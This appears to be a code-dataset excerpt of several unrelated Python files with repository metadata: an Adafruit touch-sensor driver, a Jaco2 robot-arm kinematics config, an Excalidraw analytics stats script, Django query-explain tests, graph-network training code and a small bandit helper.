] | null | null | null | adafruit_focaltouch.py | dsudduth/Adafruit_CircuitPython_FocalTouch | 3b4bf5246ecea9d88a5143ef7a3805fbae395819 | [
"MIT"
] | null | null | null | adafruit_focaltouch.py | dsudduth/Adafruit_CircuitPython_FocalTouch | 3b4bf5246ecea9d88a5143ef7a3805fbae395819 | [
"MIT"
] | null | null | null | # The MIT License (MIT)
#
# Copyright (c) 2017 ladyada for adafruit industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_focaltouch`
====================================================
CircuitPython driver for common low-cost FocalTech capacitive touch chips.
Currently supports FT6206 & FT6236.
* Author(s): ladyada
Implementation Notes
--------------------
**Hardware:**
* Adafruit `2.8" TFT LCD with Cap Touch Breakout Board w/MicroSD Socket
<http://www.adafruit.com/product/2090>`_ (Product ID: 2090)
* Adafruit `2.8" TFT Touch Shield for Arduino w/Capacitive Touch
<http://www.adafruit.com/product/1947>`_ (Product ID: 1947)
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the ESP8622 and M0-based boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's Bus Device library (when using I2C/SPI):
https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
"""
# imports
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_FocalTouch.git"
try:
import struct
except ImportError:
import ustruct as struct
from adafruit_bus_device.i2c_device import I2CDevice
from micropython import const
_FT6206_DEFAULT_I2C_ADDR = 0x38
_FT6XXX_REG_DATA = const(0x00)
_FT6XXX_REG_NUMTOUCHES = const(0x02)
_FT6XXX_REG_THRESHHOLD = const(0x80)
_FT6XXX_REG_POINTRATE = const(0x88)
_FT6XXX_REG_LIBH = const(0xA1)
_FT6XXX_REG_LIBL = const(0xA2)
_FT6XXX_REG_CHIPID = const(0xA3)
_FT6XXX_REG_FIRMVERS = const(0xA6)
_FT6XXX_REG_VENDID = const(0xA8)
_FT6XXX_REG_RELEASE = const(0xAF)
class Adafruit_FocalTouch:
"""
A driver for the FocalTech capacitive touch sensor.
"""
_debug = False
chip = None
def __init__(self, i2c, address=_FT6206_DEFAULT_I2C_ADDR, debug=False):
self._i2c = I2CDevice(i2c, address)
self._debug = debug
chip_data = self._read(_FT6XXX_REG_LIBH, 8)
lib_ver, chip_id, _, _, firm_id, _, vend_id = struct.unpack('>HBBBBBB', chip_data)
if vend_id != 0x11:
raise RuntimeError("Did not find FT chip")
if chip_id == 0x06:
self.chip = "FT6206"
elif chip_id == 0x64:
self.chip = "FT6236"
if debug:
print("Library vers %04X" % lib_ver)
print("Firmware ID %02X" % firm_id)
print("Point rate %d Hz" % self._read(_FT6XXX_REG_POINTRATE, 1)[0])
print("Thresh %d" % self._read(_FT6XXX_REG_THRESHHOLD, 1)[0])
@property
def touched(self):
""" Returns the number of touches currently detected """
return self._read(_FT6XXX_REG_NUMTOUCHES, 1)[0]
# pylint: disable=unused-variable
@property
def touches(self):
"""
Returns a list of touchpoint dicts, with 'x' and 'y' containing the
touch coordinates, and 'id' as the touch # for multitouch tracking
"""
touchpoints = []
data = self._read(_FT6XXX_REG_DATA, 32)
for i in range(2):
point_data = data[i*6+3 : i*6+9]
if all([i == 0xFF for i in point_data]):
continue
#print([hex(i) for i in point_data])
x, y, weight, misc = struct.unpack('>HHBB', point_data)
#print(x, y, weight, misc)
touch_id = y >> 12
x &= 0xFFF
y &= 0xFFF
point = {'x':x, 'y':y, 'id':touch_id}
touchpoints.append(point)
return touchpoints
# pylint: enable=unused-variable
def _read(self, register, length):
"""Returns an array of 'length' bytes from the 'register'"""
with self._i2c as i2c:
i2c.write(bytes([register & 0xFF]))
result = bytearray(length)
i2c.readinto(result)
if self._debug:
print("\t$%02X => %s" % (register, [hex(i) for i in result]))
return result
def _write(self, register, values):
"""Writes an array of 'length' bytes to the 'register'"""
with self._i2c as i2c:
values = [(v & 0xFF) for v in [register]+values]
i2c.write(bytes(values))
if self._debug:
print("\t$%02X <= %s" % (values[0], [hex(i) for i in values[1:]]))
| 33.974194 | 90 | 0.653437 |
4a22643a123a0ad95ad0de98cef1d01003682e37 | 13,361 | py | Python | abr_control/arms/jaco2/config.py | cambel/abr_control | 85c116dfc3f1561a85d6b915beb75d8a2b3980d2 | [
"BSD-3-Clause"
] | null | null | null | abr_control/arms/jaco2/config.py | cambel/abr_control | 85c116dfc3f1561a85d6b915beb75d8a2b3980d2 | [
"BSD-3-Clause"
] | null | null | null | abr_control/arms/jaco2/config.py | cambel/abr_control | 85c116dfc3f1561a85d6b915beb75d8a2b3980d2 | [
"BSD-3-Clause"
] | null | null | null | # Config file for Jaco 2 in VREP
import numpy as np
import sympy as sp
import abr_control
from ..base_config import BaseConfig
class Config(BaseConfig):
""" Robot config file for the Kinova Jaco^2 V2
Parameters
----------
hand_attached : boolean, optional (Default: False)
if false will set the last wrist joint as the end effector
if true will set the palm of the hand as the end effector
Attributes
----------
REST_ANGLES : numpy.array
the joint angles the arm tries to push towards with the
null controller
_M_LINKS : sympy.diag
inertia matrix of the links
_M_JOINTS : sympy.diag
inertia matrix of the joints
L : numpy.array
segment lengths of arm [meters]
L_HANDCOM : numpy.array
offset to the center of mass of the hand [meters]
Transform Naming Convention: Tpoint1point2
ex: Tj1l1 tranforms from joint 1 to link 1
Transforms are broken up into two matrices for simplification
ex: Tj0l1a and Tj0l1b where the former transform accounts for
joint rotations and the latter accounts for static rotations
and translations
"""
def __init__(self, hand_attached=False, **kwargs):
self.hand_attached = hand_attached
N_LINKS = 7 if hand_attached is True else 6
super(Config, self).__init__(
N_JOINTS=6, N_LINKS=N_LINKS, ROBOT_NAME='jaco2', **kwargs)
if self.MEANS is None:
self.MEANS = { # expected mean of joint angles / velocities
'q': np.ones(self.N_JOINTS) * np.pi,
'dq': np.array([-0.01337, 0.00192, 0.00324,
0.02502, -0.02226, -0.01342])
}
if self.SCALES is None:
self.SCALES = { # expected variance of joint angles / velocities
'q': np.ones(self.N_JOINTS) * np.pi * np.sqrt(self.N_JOINTS),
'dq': (np.array([1.22826, 2.0, 1.42348,
2.58221, 2.50768, 1.27004])
* np.sqrt(self.N_JOINTS))
}
self._T = {} # dictionary for storing calculated transforms
# set up saved functions folder to be in the abr_jaco repo
self.config_folder += ('with_hand' if self.hand_attached is True
else 'no_hand')
# make config folder if it doesn't exist
abr_control.utils.os_utils.makedirs(self.config_folder)
self.JOINT_NAMES = ['joint%i' % ii
for ii in range(self.N_JOINTS)]
self.REST_ANGLES = np.array(
[None, 2.42, 2.42, 0.0, 0.0, 0.0], dtype='float32')
# inertia values in VREP are divided by mass, account for that here
self._M_LINKS = [
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link0
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link1
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link2
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link3
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link3
sp.diag(0.5, 0.5, 0.5, 0.02, 0.02, 0.02), # link4
sp.diag(0.25, 0.25, 0.25, 0.01, 0.01, 0.01)] # link5
if self.hand_attached is True:
self._M_LINKS.append(
sp.diag(0.37, 0.37, 0.37, 0.04, 0.04, 0.04)) # link6
# the joints don't weigh anything in VREP
self._M_JOINTS = [sp.zeros(6, 6) for ii in range(self.N_JOINTS)]
# ignoring lengths < 1e-6
self.L = [
[0.0, 0.0, 7.8369e-02], # link 0 offset
[-3.2712e-05, -1.7324e-05, 7.8381e-02], # joint 0 offset
[2.1217e-05, 4.8455e-05, -7.9515e-02], # link 1 offset
[-2.2042e-05, 1.3245e-04, -3.8863e-02], # joint 1 offset
[-1.9519e-03, 2.0902e-01, -2.8839e-02], # link 2 offset
[-2.3094e-02, -1.0980e-06, 2.0503e-01], # joint 2 offset
[-4.8786e-04, -8.1945e-02, -1.2931e-02], # link 3 offset
[2.5923e-04, -3.8935e-03, -1.2393e-01], # joint 3 offset
[-4.0053e-04, 1.2581e-02, -3.5270e-02], # link 4 offset
[-2.3603e-03, -4.8662e-03, 3.7097e-02], # joint 4 offset
[-5.2974e-04, 1.2272e-02, -3.5485e-02], # link 5 offset
[-1.9534e-03, 5.0298e-03, -3.7176e-02]] # joint 5 offset
if self.hand_attached is True: # add in hand offset
self.L.append([0.0, 0.0, 0.0]) # offset for the end of fingers
self.L = np.array(self.L)
if self.hand_attached is True: # add in hand offset
self.L_HANDCOM = np.array([0.0, 0.0, -0.08]) # com of the hand
# ---- Transform Matrices ----
# Transform matrix : origin -> link 0
# no change of axes, account for offsets
self.Torgl0 = sp.Matrix([
[1, 0, 0, self.L[0, 0]],
[0, 1, 0, self.L[0, 1]],
[0, 0, 1, self.L[0, 2]],
[0, 0, 0, 1]])
# Transform matrix : link0 -> joint 0
# account for change of axes and offsets
self.Tl0j0 = sp.Matrix([
[1, 0, 0, self.L[1, 0]],
[0, -1, 0, self.L[1, 1]],
[0, 0, -1, self.L[1, 2]],
[0, 0, 0, 1]])
# Transform matrix : joint 0 -> link 1
# account for rotations due to q
self.Tj0l1a = sp.Matrix([
[sp.cos(self.q[0]), -sp.sin(self.q[0]), 0, 0],
[sp.sin(self.q[0]), sp.cos(self.q[0]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for change of axes and offsets
self.Tj0l1b = sp.Matrix([
[-1, 0, 0, self.L[2, 0]],
[0, -1, 0, self.L[2, 1]],
[0, 0, 1, self.L[2, 2]],
[0, 0, 0, 1]])
self.Tj0l1 = self.Tj0l1a * self.Tj0l1b
# Transform matrix : link 1 -> joint 1
# account for axes rotation and offset
self.Tl1j1 = sp.Matrix([
[1, 0, 0, self.L[3, 0]],
[0, 0, -1, self.L[3, 1]],
[0, 1, 0, self.L[3, 2]],
[0, 0, 0, 1]])
# Transform matrix : joint 1 -> link 2
# account for rotations due to q
self.Tj1l2a = sp.Matrix([
[sp.cos(self.q[1]), -sp.sin(self.q[1]), 0, 0],
[sp.sin(self.q[1]), sp.cos(self.q[1]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes rotation and offsets
self.Tj1l2b = sp.Matrix([
[0, -1, 0, self.L[4, 0]],
[0, 0, 1, self.L[4, 1]],
[-1, 0, 0, self.L[4, 2]],
[0, 0, 0, 1]])
self.Tj1l2 = self.Tj1l2a * self.Tj1l2b
# Transform matrix : link 2 -> joint 2
# account for axes rotation and offsets
self.Tl2j2 = sp.Matrix([
[0, 0, 1, self.L[5, 0]],
[1, 0, 0, self.L[5, 1]],
[0, 1, 0, self.L[5, 2]],
[0, 0, 0, 1]])
# Transform matrix : joint 2 -> link 3
# account for rotations due to q
self.Tj2l3a = sp.Matrix([
[sp.cos(self.q[2]), -sp.sin(self.q[2]), 0, 0],
[sp.sin(self.q[2]), sp.cos(self.q[2]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes rotation and offsets
self.Tj2l3b = sp.Matrix([
[0.14262926, -0.98977618, 0, self.L[6, 0]],
[0, 0, 1, self.L[6, 1]],
[-0.98977618, -0.14262926, 0, self.L[6, 2]],
[0, 0, 0, 1]])
self.Tj2l3 = self.Tj2l3a * self.Tj2l3b
# Transform matrix : link 3 -> joint 3
# account for axes change and offsets
self.Tl3j3 = sp.Matrix([
[-0.14262861, -0.98977628, 0, self.L[7, 0]],
[0.98977628, -0.14262861, 0, self.L[7, 1]],
[0, 0, 1, self.L[7, 2]],
[0, 0, 0, 1]])
# Transform matrix: joint 3 -> link 4
# account for rotations due to q
self.Tj3l4a = sp.Matrix([
[sp.cos(self.q[3]), -sp.sin(self.q[3]), 0, 0],
[sp.sin(self.q[3]), sp.cos(self.q[3]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes and rotation and offsets
self.Tj3l4b = sp.Matrix([
[0.85536427, -0.51802699, 0, self.L[8, 0]],
[-0.45991232, -0.75940555, 0.46019982, self.L[8, 1]],
[-0.23839593, -0.39363848, -0.88781537, self.L[8, 2]],
[0, 0, 0, 1]])
self.Tj3l4 = self.Tj3l4a * self.Tj3l4b
# Transform matrix: link 4 -> joint 4
# no axes change, account for offsets
self.Tl4j4 = sp.Matrix([
[-0.855753802, 0.458851168, 0.239041914, self.L[9, 0]],
[0.517383113, 0.758601438, 0.396028500, self.L[9, 1]],
[0, 0.462579144, -0.886577910, self.L[9, 2]],
[0, 0, 0, 1]])
# Transform matrix: joint 4 -> link 5
# account for rotations due to q
self.Tj4l5a = sp.Matrix([
[sp.cos(self.q[4]), -sp.sin(self.q[4]), 0, 0],
[sp.sin(self.q[4]), sp.cos(self.q[4]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes and rotation and offsets
# no axes change, account for offsets
self.Tj4l5b = sp.Matrix([
[0.89059413, 0.45479896, 0, self.L[10, 0]],
[-0.40329059, 0.78972966, -0.46225942, self.L[10, 1]],
[-0.2102351, 0.41168552, 0.88674474, self.L[10, 2]],
[0, 0, 0, 1]])
self.Tj4l5 = self.Tj4l5a * self.Tj4l5b
# Transform matrix : link 5 -> joint 5
# account for axes change and offsets
self.Tl5j5 = sp.Matrix([
[-0.890598824, 0.403618758, 0.209584432, self.L[11, 0]],
[-0.454789710, -0.790154512, -0.410879747, self.L[11, 1]],
[0, -0.461245863, 0.887272337, self.L[11, 2]],
[0, 0, 0, 1]])
if self.hand_attached is True: # add in hand offset
# Transform matrix: joint 5 -> link 6 / hand COM
# account for rotations due to q
self.Tj5handcoma = sp.Matrix([
[sp.cos(self.q[5]), -sp.sin(self.q[5]), 0, 0],
[sp.sin(self.q[5]), sp.cos(self.q[5]), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# account for axes changes and offsets
self.Tj5handcomb = sp.Matrix([
[-1, 0, 0, self.L_HANDCOM[0]],
[0, 1, 0, self.L_HANDCOM[1]],
[0, 0, -1, self.L_HANDCOM[2]],
[0, 0, 0, 1]])
self.Tj5handcom = self.Tj5handcoma * self.Tj5handcomb
# no axes change, account for offsets
self.Thandcomfingers = sp.Matrix([
[1, 0, 0, self.L[12, 0]],
[0, 1, 0, self.L[12, 1]],
[0, 0, 1, self.L[12, 2]],
[0, 0, 0, 1]])
# orientation part of the Jacobian (compensating for angular velocity)
self.J_orientation = [
self._calc_T('joint0')[:3, :3] * self._KZ, # joint 0 orientation
self._calc_T('joint1')[:3, :3] * self._KZ, # joint 1 orientation
self._calc_T('joint2')[:3, :3] * self._KZ, # joint 2 orientation
self._calc_T('joint3')[:3, :3] * self._KZ, # joint 3 orientation
self._calc_T('joint4')[:3, :3] * self._KZ, # joint 4 orientation
self._calc_T('joint5')[:3, :3] * self._KZ] # joint 5 orientation
def _calc_T(self, name): # noqa C907
""" Uses Sympy to generate the transform for a joint or link
name : string
name of the joint, link, or end-effector
"""
if self._T.get(name, None) is None:
if name == 'link0':
self._T[name] = self.Torgl0
elif name == 'joint0':
self._T[name] = self._calc_T('link0') * self.Tl0j0
elif name == 'link1':
self._T[name] = self._calc_T('joint0') * self.Tj0l1
elif name == 'joint1':
self._T[name] = self._calc_T('link1') * self.Tl1j1
elif name == 'link2':
self._T[name] = self._calc_T('joint1') * self.Tj1l2
elif name == 'joint2':
self._T[name] = self._calc_T('link2') * self.Tl2j2
elif name == 'link3':
self._T[name] = self._calc_T('joint2') * self.Tj2l3
elif name == 'joint3':
self._T[name] = self._calc_T('link3') * self.Tl3j3
elif name == 'link4':
self._T[name] = self._calc_T('joint3') * self.Tj3l4
elif name == 'joint4':
self._T[name] = self._calc_T('link4') * self.Tl4j4
elif name == 'link5':
self._T[name] = self._calc_T('joint4') * self.Tj4l5
elif name == 'joint5':
self._T[name] = self._calc_T('link5') * self.Tl5j5
elif self.hand_attached is False and name == 'EE':
self._T[name] = self._calc_T('joint5')
elif self.hand_attached is True and name == 'link6':
self._T[name] = self._calc_T('joint5') * self.Tj5handcom
elif self.hand_attached is True and name == 'EE':
self._T[name] = self._calc_T('link6') * self.Thandcomfingers
else:
raise Exception('Invalid transformation name: %s' % name)
return self._T[name]
| 41.365325 | 78 | 0.502058 |
4a226564cbad6fffee8dcadb0db744869fbbc7a9 | 4,857 | py | Python | stats.py | marcottebear/excalidraw-libraries | b812c95129f88474d3e0da4a0b51f135f8cc05f8 | [
"MIT"
] | null | null | null | stats.py | marcottebear/excalidraw-libraries | b812c95129f88474d3e0da4a0b51f135f8cc05f8 | [
"MIT"
] | null | null | null | stats.py | marcottebear/excalidraw-libraries | b812c95129f88474d3e0da4a0b51f135f8cc05f8 | [
"MIT"
] | null | null | null | from apiclient.discovery import build
from datetime import date
from datetime import timedelta
from oauth2client.service_account import ServiceAccountCredentials
import os
import json
SCOPES = ["https://www.googleapis.com/auth/analytics.readonly"]
VIEW_ID = "208661610"
THRESSHOLD = 10
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
STATS_DIR = os.path.join(ROOT_DIR, "stats")
KEY_FILE = os.path.join(ROOT_DIR, "excalidraw-key.json")
MAP = {
"Android": "g-script-android",
"Apple Devices Frames": "franky47-apple-devices-frames",
"Charts": "g-script-charts",
"Data Viz": "dbssticky-DataViz",
"Dropdowns": "h7y-dropdowns",
"Forms": "g-script-forms",
"Gadgets": "morgemoensch-gadgets",
"Hearts": "dwelle-hearts",
"Information Architecture": "inwardmovement-information-architecture",
"IT Logos": "pclainchard-it-logos",
"Medias": "g-script-medias",
"Polygons": "lipis-polygons",
"RaspberryPI": "revolunet-raspberrypi3",
"Software Architecture": "youritjang-software-architecture",
"Stars": "lipis-stars",
"Stick figures": "youritjang-stick-figures",
"Stick Figures": "youritjang-stick-figures",
}
def initialize_analyticsreporting():
credentials = ServiceAccountCredentials.from_json_keyfile_name(KEY_FILE, SCOPES)
return build("analyticsreporting", "v4", credentials=credentials)
def get_library_report(analytics, day="yesterday"):
return (
analytics.reports()
.batchGet(
body={
"reportRequests": [
{
"viewId": VIEW_ID,
"dateRanges": [{"startDate": day, "endDate": day}],
"metrics": [{"expression": "ga:totalEvents"}],
"dimensions": [
{"name": "ga:eventCategory"},
{"name": "ga:eventAction"},
{"name": "ga:eventLabel"},
],
}
]
}
)
.execute()
)
def print_library_response(response):
counts = {}
for report in response.get("reports", []):
for row in report.get("data", {}).get("rows", []):
dimensions = row.get("dimensions", [])
metrics = row.get("metrics", [])
if not (
dimensions[0] == "library"
and dimensions[1] in ["download", "import"]
and dimensions[2] != "(not set)"
):
continue
label = dimensions[2]
label = label if label not in MAP else MAP[label]
value = int(metrics[0]["values"][0])
if label in counts:
counts[label] += value
else:
counts[label] = value
for download in counts:
print(download, ":", counts[download])
return counts
def main():
if not os.path.exists(KEY_FILE):
print("Key file not found", KEY_FILE)
return
today = date.today()
# Set current date to 2020-12-11 to count all visits from the beginning:
current_date = date(2020, 12, 11)
stats = {}
analytics = initialize_analyticsreporting()
total_downloads = 0
total_downloads_day = 0
total_downloads_week = 0
while current_date <= today:
day = current_date.strftime("%Y-%m-%d")
print()
print(day)
print("-" * 40)
response = get_library_report(analytics, day)
libraries = print_library_response(response)
for library in libraries:
total = libraries[library]
total_downloads += total
if library in stats:
stats[library]["total"] += total
else:
stats[library] = {"total": total, "week": 0}
if current_date > today + timedelta(days=-7):
total_downloads_week += total
stats[library]["week"] += total
if current_date == today:
total_downloads_day += total
if libraries:
with open(os.path.join(STATS_DIR, day + ".json"), "w") as outfile:
json.dump(libraries, outfile, indent=2)
if stats:
with open(os.path.join(ROOT_DIR, "stats.json"), "w") as outfile:
json.dump(stats, outfile, indent=2)
with open(os.path.join(ROOT_DIR, "total.json"), "w") as outfile:
json.dump(
{
"total": total_downloads,
"week": total_downloads_week,
"day": total_downloads_day,
},
outfile,
indent=2,
)
current_date += timedelta(days=1)
print()
if __name__ == "__main__":
main()
| 32.817568 | 84 | 0.544781 |
4a22656657f832889f8bd514330480dfa1fe4cc4 | 5,190 | py | Python | tests/queries/test_explain.py | agarwalutkarsh554/django | 5ea9254530831bcdbf3af694f7cf08584fc8c051 | [
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 7 | 2015-09-08T22:23:36.000Z | 2022-03-08T09:24:40.000Z | tests/queries/test_explain.py | agarwalutkarsh554/django | 5ea9254530831bcdbf3af694f7cf08584fc8c051 | [
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 8 | 2017-04-19T16:20:47.000Z | 2022-03-28T14:40:11.000Z | tests/queries/test_explain.py | agarwalutkarsh554/django | 5ea9254530831bcdbf3af694f7cf08584fc8c051 | [
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] | 3 | 2020-07-13T04:49:16.000Z | 2021-12-22T21:15:14.000Z | import unittest
from django.db import NotSupportedError, connection, transaction
from django.db.models import Count
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from .models import Tag
@skipUnlessDBFeature('supports_explaining_query_execution')
class ExplainTests(TestCase):
def test_basic(self):
querysets = [
Tag.objects.filter(name='test'),
Tag.objects.filter(name='test').select_related('parent'),
Tag.objects.filter(name='test').prefetch_related('children'),
Tag.objects.filter(name='test').annotate(Count('children')),
Tag.objects.filter(name='test').values_list('name'),
Tag.objects.order_by().union(Tag.objects.order_by().filter(name='test')),
Tag.objects.all().select_for_update().filter(name='test'),
]
supported_formats = connection.features.supported_explain_formats
all_formats = (None,) + tuple(supported_formats) + tuple(f.lower() for f in supported_formats)
for idx, queryset in enumerate(querysets):
for format in all_formats:
with self.subTest(format=format, queryset=idx):
with self.assertNumQueries(1), CaptureQueriesContext(connection) as captured_queries:
result = queryset.explain(format=format)
self.assertTrue(captured_queries[0]['sql'].startswith(connection.ops.explain_prefix))
self.assertIsInstance(result, str)
self.assertTrue(result)
@skipUnlessDBFeature('validates_explain_options')
def test_unknown_options(self):
with self.assertRaisesMessage(ValueError, 'Unknown options: test, test2'):
Tag.objects.all().explain(test=1, test2=1)
def test_unknown_format(self):
msg = 'DOES NOT EXIST is not a recognized format.'
if connection.features.supported_explain_formats:
msg += ' Allowed formats: %s' % ', '.join(sorted(connection.features.supported_explain_formats))
with self.assertRaisesMessage(ValueError, msg):
Tag.objects.all().explain(format='does not exist')
@unittest.skipUnless(connection.vendor == 'postgresql', 'PostgreSQL specific')
def test_postgres_options(self):
qs = Tag.objects.filter(name='test')
test_options = [
{'COSTS': False, 'BUFFERS': True, 'ANALYZE': True},
{'costs': False, 'buffers': True, 'analyze': True},
{'verbose': True, 'timing': True, 'analyze': True},
{'verbose': False, 'timing': False, 'analyze': True},
{'summary': True},
]
if connection.features.is_postgresql_12:
test_options.append({'settings': True})
if connection.features.is_postgresql_13:
test_options.append({'analyze': True, 'wal': True})
for options in test_options:
with self.subTest(**options), transaction.atomic():
with CaptureQueriesContext(connection) as captured_queries:
qs.explain(format='text', **options)
self.assertEqual(len(captured_queries), 1)
for name, value in options.items():
option = '{} {}'.format(name.upper(), 'true' if value else 'false')
self.assertIn(option, captured_queries[0]['sql'])
@unittest.skipUnless(connection.vendor == 'mysql', 'MySQL specific')
def test_mysql_text_to_traditional(self):
# Ensure these cached properties are initialized to prevent queries for
# the MariaDB or MySQL version during the QuerySet evaluation.
connection.features.supported_explain_formats
with CaptureQueriesContext(connection) as captured_queries:
Tag.objects.filter(name='test').explain(format='text')
self.assertEqual(len(captured_queries), 1)
self.assertIn('FORMAT=TRADITIONAL', captured_queries[0]['sql'])
@unittest.skipUnless(connection.vendor == 'mysql', 'MariaDB and MySQL >= 8.0.18 specific.')
def test_mysql_analyze(self):
qs = Tag.objects.filter(name='test')
with CaptureQueriesContext(connection) as captured_queries:
qs.explain(analyze=True)
self.assertEqual(len(captured_queries), 1)
prefix = 'ANALYZE ' if connection.mysql_is_mariadb else 'EXPLAIN ANALYZE '
self.assertTrue(captured_queries[0]['sql'].startswith(prefix))
with CaptureQueriesContext(connection) as captured_queries:
qs.explain(analyze=True, format='JSON')
self.assertEqual(len(captured_queries), 1)
if connection.mysql_is_mariadb:
self.assertIn('FORMAT=JSON', captured_queries[0]['sql'])
else:
self.assertNotIn('FORMAT=JSON', captured_queries[0]['sql'])
@skipIfDBFeature('supports_explaining_query_execution')
class ExplainUnsupportedTests(TestCase):
def test_message(self):
msg = 'This backend does not support explaining query execution.'
with self.assertRaisesMessage(NotSupportedError, msg):
Tag.objects.filter(name='test').explain()
| 49.903846 | 109 | 0.658382 |
4a22659903f929a46406799eb3d235789cf304f2 | 162 | py | Python | modulo6/herencia_website/models/product.py | odooerpdevelopers/cuso-odoo12-frontend | e93c23d79465565b8f297c4702aeb3698d15d9e7 | [
"MIT"
] | 1 | 2021-07-23T22:02:27.000Z | 2021-07-23T22:02:27.000Z | modulo6/herencia_website/models/product.py | odooerpdevelopers/curso-odoo12-frontend | e93c23d79465565b8f297c4702aeb3698d15d9e7 | [
"MIT"
] | null | null | null | modulo6/herencia_website/models/product.py | odooerpdevelopers/curso-odoo12-frontend | e93c23d79465565b8f297c4702aeb3698d15d9e7 | [
"MIT"
] | null | null | null | from odoo import fields, models
class Product(models.Model):
_inherit = "product.template"
description_2 = fields.Html(string="Descripcion Extendida")
| 20.25 | 63 | 0.746914 |
4a226633275f2886da747bd74f650f2fbd8d1c42 | 2,657 | py | Python | train/train_SBMs_node_classification.py | ChaofanTao/litegt | 65c8d9ee9a2b9dcc1de9f39df7e9a8af5b69c1d8 | [
"MIT"
] | 5 | 2021-10-04T07:35:15.000Z | 2022-03-28T05:38:38.000Z | train/train_SBMs_node_classification.py | ChaofanTao/litegt | 65c8d9ee9a2b9dcc1de9f39df7e9a8af5b69c1d8 | [
"MIT"
] | null | null | null | train/train_SBMs_node_classification.py | ChaofanTao/litegt | 65c8d9ee9a2b9dcc1de9f39df7e9a8af5b69c1d8 | [
"MIT"
] | null | null | null | """
Utility functions for training one epoch
and evaluating one epoch
"""
import torch
import torch.nn as nn
import math
import dgl
from tqdm import tqdm
from train.metrics import accuracy_SBM as accuracy
def train_epoch(model, optimizer, device, data_loader, epoch):
model.train()
epoch_loss = 0
epoch_train_acc = 0
nb_data = 0
gpu_mem = 0
pbar = tqdm(enumerate(data_loader))
for iter, (batch_graphs, batch_labels) in pbar:
pbar.set_description("batch id", iter)
batch_graphs = batch_graphs.to(device)
batch_x = batch_graphs.ndata['feat'].to(device) # num x feat
batch_e = batch_graphs.edata['feat'].to(device)
batch_labels = batch_labels.to(device)
optimizer.zero_grad()
try:
batch_lap_pos_enc = batch_graphs.ndata['lap_pos_enc'].to(device)
sign_flip = torch.rand(batch_lap_pos_enc.size(1)).to(device)
sign_flip[sign_flip>=0.5] = 1.0; sign_flip[sign_flip<0.5] = -1.0
batch_lap_pos_enc = batch_lap_pos_enc * sign_flip.unsqueeze(0)
except:
batch_lap_pos_enc = None
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_lap_pos_enc)
loss = model.loss(batch_scores, batch_labels)
loss.backward()
optimizer.step()
epoch_loss += loss.detach().item()
acc = accuracy(batch_scores, batch_labels)
epoch_train_acc += acc
pbar.set_postfix({'loss':loss.item(),'acc':acc})
epoch_loss /= (iter + 1)
epoch_train_acc /= (iter + 1)
return epoch_loss, epoch_train_acc, optimizer
def evaluate_network(model, device, data_loader, epoch):
model.eval()
epoch_test_loss = 0
epoch_test_acc = 0
nb_data = 0
with torch.no_grad():
for iter, (batch_graphs, batch_labels) in enumerate(data_loader):
batch_graphs = batch_graphs.to(device)
batch_x = batch_graphs.ndata['feat'].to(device)
batch_e = batch_graphs.edata['feat'].to(device)
batch_labels = batch_labels.to(device)
try:
batch_lap_pos_enc = batch_graphs.ndata['lap_pos_enc'].to(device)
except:
batch_lap_pos_enc = None
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_lap_pos_enc)
loss = model.loss(batch_scores, batch_labels)
epoch_test_loss += loss.detach().item()
epoch_test_acc += accuracy(batch_scores, batch_labels)
epoch_test_loss /= (iter + 1)
epoch_test_acc /= (iter + 1)
return epoch_test_loss, epoch_test_acc
| 34.506494 | 91 | 0.640572 |
4a2266d4966e2f5531f84dfc82c89d1efe85ff5c | 657 | py | Python | core.py | DilipA/BanditPlayground | 10b16d87c379655bf54a82a79939c71dbf0eb839 | [
"MIT"
] | 713 | 2015-01-03T03:50:35.000Z | 2022-03-22T11:11:44.000Z | python/core.py | levylll/BanditsBook | 67962387b55172a7edeb492f5ae3eaf0061edd38 | [
"MIT"
] | 8 | 2016-01-07T18:58:35.000Z | 2022-02-28T14:27:06.000Z | python/core.py | levylll/BanditsBook | 67962387b55172a7edeb492f5ae3eaf0061edd38 | [
"MIT"
] | 226 | 2015-01-02T11:27:38.000Z | 2022-03-09T04:09:43.000Z | # Convenience functions
def ind_max(x):
m = max(x)
return x.index(m)
# Need access to random numbers
import random
